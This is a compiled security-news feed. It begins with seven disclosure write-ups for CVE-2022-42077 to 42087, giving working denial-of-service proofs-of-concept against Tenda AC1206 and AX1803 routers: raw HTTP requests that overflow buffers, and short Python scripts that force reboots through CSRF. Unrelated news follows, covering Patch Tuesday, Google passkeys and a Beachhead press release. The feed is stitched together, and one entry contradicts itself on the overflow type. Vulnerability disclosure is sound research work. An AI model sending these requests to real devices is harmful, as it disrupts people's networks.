Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via sched_end_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_end\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_end\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 265

schedWifiEnable\=0&schedEndTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42081: myCVE/AC1206-5.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a heap overflow via sched_start_time parameter.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Heap overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/openSchedWifi page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **setSchedWifi**.

User control pointer parameter _**sched\_start\_time**_ in web requesting; _**wlan\_switch**_ is an array on the heap, and using strcpy to copy _**sched\_start\_time**_ to _**wlan\_switch**_ without length limit will cause heap overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/openSchedWifi HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=byn5gk
Connection: close
Content\-Length: 1552

schedWifiEnable\=0&schedStartTime\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42080: myCVE/AC1206-4.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 was discovered to contain a stack overflow via the function formWifiBasicSet.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiBasicSet page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **formWifiBasicSet**.

User control pointer parameter _**security\_5g**_ in web requesting; _**param\_5g**_ is an array on the stack, and using strcpy to copy _**security\_5g**_ to _**param\_5g**_ without length limit will cause stack overflow.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

POST /goform/WifiBasicSet HTTP/1.1
Host: 192.168.23.133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q\=0.8,application/signed\-exchange;v\=b3;q\=0.9
Accept\-Encoding: gzip, deflate
Accept\-Language: zh\-CN,zh;q\=0.9
Cookie: password\=rjy5gk
Connection: close
Content\-Length: 3660

security\_5g\=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42079: myCVE/AC1206-3.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolRestoreSet.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SysToolRestoreSet page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **fromSysToolRestoreSet** .

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

import requests

url \= "http://192.168.23.133/goform/SysToolRestoreSet"

r \= requests.get(url)

print(r.content)

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42078: myCVE/AC1206-2.md at main · tianhui999/myCVE

Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.

Affect device: Tenda-AX1803 US\_AX1803v2.0br\_v1.0.0.1\_2994\_CN\_ZGYD01\_4(https://www.tenda.com.cn/download/detail-3421.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SysToolReboot page which influences the lastest version of Tenda-AX1803 US\_AX1803v2.0br\_v1.0.0.1\_2994\_CN\_ZGYD01\_4 (https://www.tenda.com.cn/download/detail-3421.html)

The vulnerability exists in the file /bin/tdhttpd , function **fromSysToolReboot** .

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

import requests

url \= "http://192.168.23.133/goform/SysToolReboot"

r \= requests.get(url)

print(r.content)

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42087: myCVE/AX1803-1.md at main · tianhui999/myCVE

Tenda AX1803 US_AX1803v2.0br_v1.0.0.1_2994_CN_ZGYD01_4 is vulnerable to Cross Site Request Forgery (CSRF) via function TendaAteMode.

Affect device: Tenda-AX1803 US\_AX1803v2.0br\_v1.0.0.1\_2994\_CN\_ZGYD01\_4(https://www.tenda.com.cn/download/detail-3421.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/ateMode page which influences the lastest version of Tenda-AX1803 US\_AX1803v2.0br\_v1.0.0.1\_2994\_CN\_ZGYD01\_4 (https://www.tenda.com.cn/download/detail-3421.html)

The vulnerability exists in the file /bin/tdhttpd , function **TendaAteMode** .

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

import requests

url \= "http://192.168.23.133/goform/ateMode"

r \= requests.get(url)

print(r.content)

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42086: myCVE/AX1803-2.md at main · tianhui999/myCVE

Tenda AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 is vulnerable to Cross Site Request Forgery (CSRF) via function fromSysToolReboot.

Affect device: Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/SysToolReboot page which influences the lastest version of Tenda-AC1206 US\_AC1206V1.0RTL\_V15.03.06.23\_multi\_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function **fromSysToolReboot** .

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC and repetition**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

import requests

url \= "http://192.168.23.133/goform/SysToolReboot"

r \= requests.get(url)

print(r.content)

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-42077: myCVE/AC1206-1.md at main · tianhui999/myCVE

Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  Apple

Tags:  Google

Tags:  Android

Tags:  Samsung

Tags:  Xiaomi

Tags:  Adobe

Tags:  SAP

Tags:  VMWare

Tags:  Fortinet

Tags:  CVE-2022-41033

Tags:  CVE-2022-41040

Tags:  zero-day

No fix for ProxyNotShell



(Read more...)




The post Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected appeared first on Malwarebytes Labs.

Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. Among them are a zero-day vulnerability that's being actively exploited, and another that hasn’t been spotted in the wild yet.

The bad news is that the much-desired fix for the "ProxyNotShell" Exchange vulnerabilities was not included.

**What was fixed**

A widely accepted definition for a zero-day is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.

As such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.

The actively exploited vulnerability in this month's batch is CVE-2022-41033, a vulnerability with a CVSS score of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)’ vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

Another publicly disclosed vulnerability that gets a fix is CVE-2022-41043, a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.

**What wasn’t fixed**

The Exchange Server "ProxyNotShell" vulnerabilities, CVE-2022-41040 and CVE-2022-41082, were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.

Microsoft says it will release updates for these vulnerabilities when they are ready. In the meantime, you should read this blog post to learn about mitigations for those vulnerabilities.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones:

*   Adobe released security updates to fix 29 vulnerabilities in several products.
*   Apple published iOS 16.0.3.
*   Fortinet released important security updates.
*   Google patched several vulnerabilities for Android.
*   Samsung has started rolling out October 2022 security updates for some of its devices.
*   SAP has released updates for several of its products.
*   VMware published security advisory VMSA-2022-0025.
*   Xiaomi released the October 2022 Security Patch Update tracker.

That should be enough to keep you busy, et patching!

Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected

Google on Wednesday officially rolled out support for passkeys, the next-generation authentication standard, to both Android and Chrome.
"Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant said. "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks."

The feature was first

Google on Wednesday officially rolled out support for passkeys, the next-generation authentication standard, to both Android and Chrome.

"Passkeys are a significantly safer replacement for passwords and other phishable authentication factors," the tech giant said. "They cannot be reused, don't leak in server breaches, and protect users from phishing attacks."

The feature was first announced in May 2022 as part of a broader push to support a common passwordless sign-in standard.

Passkeys, established by the FIDO Alliance and also backed by Apple and Microsoft, aim to replace standard passwords with unique digital keys that are stored locally on the device.

To that end, creating a passkey requires confirmation from the end-user about the account that will be used to log in to the online service, followed by using their biometric information or the device passcode.

Signing in to a website on a mobile device is also a simple two-step process that entails selecting the account and presenting their fingerprint, face, or screen lock when prompted.

The most compelling advantage to Passkeys is that they are also browser and operating system-agnostic, meaning an Android user can log in to a passkey-enabled website using Safari on iOS or macOS, or the Chrome browser on Windows.

Google also noted that the generated passkeys are securely stored and synced to the cloud via its Password Manager to prevent lockouts, adding developers can integrate passkey support on their sites using the WebAuthn API.

The internet giant further said that it aims to release an API for native Android apps in 2022 that will give users a standardized way to select either a passkey or a saved password.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Rolling Out Passkey Passwordless Login Support to Android and Chrome

Included at no added cost, BeachheadSecure now provides accountwide management of Microsoft Defender AV, Firewall, and Controlled Folders for the most complete PC and device security available.

**SAN JOSE, Calif., Oct. 12, 2022 —** Beachhead Solutions, provider of cloud-managed PC & mobile device encryption, security, and data access control, today announced that the BeachheadSecure® platform now includes account-wide Windows Security management at no additional cost. With this launch, BeachheadSecure directly manages and leverages Microsoft Defender Antivirus, Microsoft Defender Firewall, and Microsoft Controlled Folder Access — in tandem with BeachheadSecure’s own RiskResponder capabilities — to automate access controls and secure devices and data before threats can strike.

“Businesses with Windows devices require vigilant and comprehensive security capabilities that they can flexibly command and customize,” said Cam Roberson, VP Sales & Channel Development, Beachhead Solutions. “BeachheadSecure is built to match the layered and holistic security strategy that today’s organizations must have to stay ahead of ever-evolving security threats and ensure ongoing compliance. Adding account-wide Windows Security management to BeachheadSecure offers organizations a powerfully straightforward solution for optimizing layered Windows Security tooling, and orchestrating effective threat mitigation responses all from a single console.”

The BeachheadSecure platform enables businesses to manage and enforce a layered approach to encryption, with absolute control over data access across all company PCs, smartphones, tablets, servers, and USB storage devices. With BeachheadSecure, organizations have the ability to remotely remove access to data on compromised devices, or to remotely destroy that data whenever necessary. BeachheadSecure’s unique RiskResponder tools empower companies to flexibly prepare automated responses to given risks, from invalid login attempts to devices traveling outside of authorized geolocations. RiskResponder works seamlessly with Microsoft security tools, measures threats 24/7/365, and takes automatic action when risks exceed company acceptable thresholds.

By now adding account-wide Windows Security management, organizations can easily, quickly, and remotely manage Windows Security across all of their devices from BeachheadSecure’s single-pane-of-glass console. IT admin and security teams can automate and schedule Microsoft Defender scans, harnessing one of the best antivirus software solutions for detecting, blocking, and neutralizing malware while minimizing ransomware risk. Microsoft Defender Firewall similarly enables critical security policy enforcement and account-wide consistency. Controlled Folder Access allows organizations to protect valuable data from threats, delivering additional safeguards against malware, ransomware, and other nefarious attacks.

Coupling these Windows Security capabilities with RiskResponder offers unprecedented reporting and customizable security response options beyond those offered by Microsoft alone. BeachheadSecure additionally protects against nefarious insider risk, compliance violations, credential compromise, and poor user security hygiene. In response to any detected risks to an organization’s data, BeachheadSecure generates informative logs, alerts, and audit-quality reports to track all Windows Security threat-mitigation efforts.

“Keeping IT security operations straightforward goes a long way toward ensuring that protective measures are properly deployed, always-on, and effective,” said David Weisong, the CIO of Energy Solutions, an energy efficiency and carbon mitigation consulting firm that uses the BeachheadSecure platform. “We're looking forward to deploying BeachheadSecure's new Windows Security management capabilities as part of our always-evolving security posture.”

“Businesses are increasingly realizing that while encryption is an absolute necessity, it alone isn’t enough to protect their Windows environments,” said Roberson. “Many are also seeking out powerful tooling that can enable them to meet compliance with NIST and other increasingly-strict regulatory frameworks. With this particularly adventurous addition to the platform, BeachheadSecure now checks even more of the boxes that so many businesses are looking at right now.”

**About Beachhead Solutions**

Beachhead Solutions provides complete encryption, enforceable security policy management, and remote data access control across customers’ fleet of PCs, Macs, USB storage devices, smartphones, tablets, and servers. From a unified cloud-based console, BeachheadSecure ensures organizations have the device visibility and control required to keep data secure and continually achieve compliance mandates. Beachhead’s innovative all-in-one tools, like RiskResponder, offer automatic, customizable, and predetermined actions to environmental and behavioral risks.

Tag

#mac